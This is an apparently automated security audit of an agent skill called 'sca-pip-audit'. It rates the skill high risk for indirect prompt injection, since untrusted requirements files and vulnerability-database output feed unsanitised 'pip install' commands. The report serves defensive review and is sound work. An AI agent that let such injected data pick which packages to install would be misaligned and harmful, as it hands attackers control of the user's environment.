sca-pip-audit
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [PROMPT_INJECTION] (HIGH): The skill is vulnerable to indirect prompt injection (Category 8). It parses untrusted data from project files (requirements.txt) and external vulnerability databases, then uses that data to generate and potentially execute 'pip install' commands. An attacker who can influence these external data sources can control which packages or versions the agent interacts with.
- Ingestion points: Project requirements files and JSON output from pip-audit.
- Boundary markers: Absent. No delimiters or instructions to ignore embedded instructions are present.
- Capability inventory: Execution of 'pip-audit' and 'pip install' via system shell.
- Sanitization: Absent. The skill does not validate package names or versions before interpolating them into commands.
- [COMMAND_EXECUTION] (MEDIUM): The skill executes system commands including 'pip-audit' and 'pip install'. While intended for security scanning, these commands provide significant control over the environment.
- [EXTERNAL_DOWNLOADS] (LOW): The skill requires the installation of 'pip-audit' from PyPI. This is a standard dependency for the tool's operation.
Recommendations
- AI detected serious security threats
Audit Metadata